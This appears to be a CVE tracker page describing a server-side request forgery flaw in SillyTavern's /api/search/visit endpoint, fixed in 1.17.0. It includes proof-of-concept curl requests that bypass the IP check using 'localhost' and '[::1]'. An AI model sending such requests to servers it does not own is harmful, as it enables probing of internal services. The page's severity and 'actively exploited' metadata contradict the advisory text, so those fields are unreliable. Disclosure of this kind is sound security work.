SillyTavern: Incomplete IP validation in /api/search/visit allows SSRF via localhost and IPv6

Description

### Details Distinct from CVE-2025-59159 and CVE-2026-26286 (all fixed in v1.16.0). This endpoint is still unpatched. In `src/endpoints/search.js` line 419, the hostname is checked against `/^\d+\.\d+\.\d+\.\d+$/`. This only matches literal dotted-quad IPv4 (e.g. `127.0.0.1`, `10.0.0.1`). It does not catch: - `localhost` (hostname, not dotted-quad) - `[::1]` (IPv6 loopback) - DNS names resolving to internal addresses (e.g. `localtest.me` -> 127.0.0.1) A separate port check (`urlObj.port !== ''`) limits exploitation to services on default ports (80/443), making this lower severity than a fully unrestricted SSRF. ### PoC 1. Start SillyTavern v1.16.0 normally 2. Send requests to compare blocked vs bypassed (requires a valid session cookie or CSRF disabled): ```bash # Blocked — dotted-quad matched by regex curl -s -o /dev/null -w "%{http_code}" -X POST http://127.0.0.1:8000/api/search/visit \ -H "Content-Type: application/json" \ -d '{"url": "http://127.0.0.1/", "html": true}' # Returns: 400 (blocked) # Bypassed — "localhost" is not dotted-quad curl -s -o /dev/null -w "%{http_code}" -X POST http://127.0.0.1:8000/api/search/visit \ -H "Content-Type: application/json" \ -d '{"url": "http://localhost/", "html": true}' # Returns: 500 (passed validation, fetch attempted, ECONNREFUSED because nothing on port 80) # Bypassed — IPv6 loopback is not dotted-quad curl -s -o /dev/null -w "%{http_code}" -X POST http://127.0.0.1:8000/api/search/visit \ -H "Content-Type: application/json" \ -d '{"url": "http://[::1]/", "html": true}' # Returns: 500 (passed validation, fetch attempted) ``` The 400 vs 500 difference confirms `localhost` and `[::1]` pass the IP check. The 500 is ECONNREFUSED (nothing listening on port 80), not a validation rejection. ### Impact Server-side request forgery with partial restrictions. An authenticated user can force the server to fetch from internal hosts on default ports (80/443) using hostnames or IPv6 addresses that bypass the IP check. The full response body is returned. Lower severity than a fully unrestricted SSRF due to the port limitation. ## Resolution The issue was addressed in version 1.17.0 by improving IPv6 address validation

Affected Products

Vendor	Product	Versions
SillyTavern	sillytavern	npm/sillytavern: <= 1.16.0

References

Related News (1 articles)

Tier C

VulDB3h ago

CVE-2026-34526 | SillyTavern 1.13.4/1.16.0 localhost/IPv6 /api/search/visit server-side request forgery

→ No new info (linked only)

CVSS 3.15.0 CRITICAL

VectorCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

CISA KEV❌ No

Actively exploited✅ Yes

Patch available

sillytavern@1.17.0

CWECWE-918

PublishedApr 1, 2026

Last enriched2h agov2

SillyTavern: Incomplete IP validation in /api/search/visit allows SSRF via localhost and IPv6

Description

Affected Products

References

Related News (1 articles)

Community Vote

Related CVEs (1)

Pin to Dashboard

Verification

Vulnerability Timeline

Version History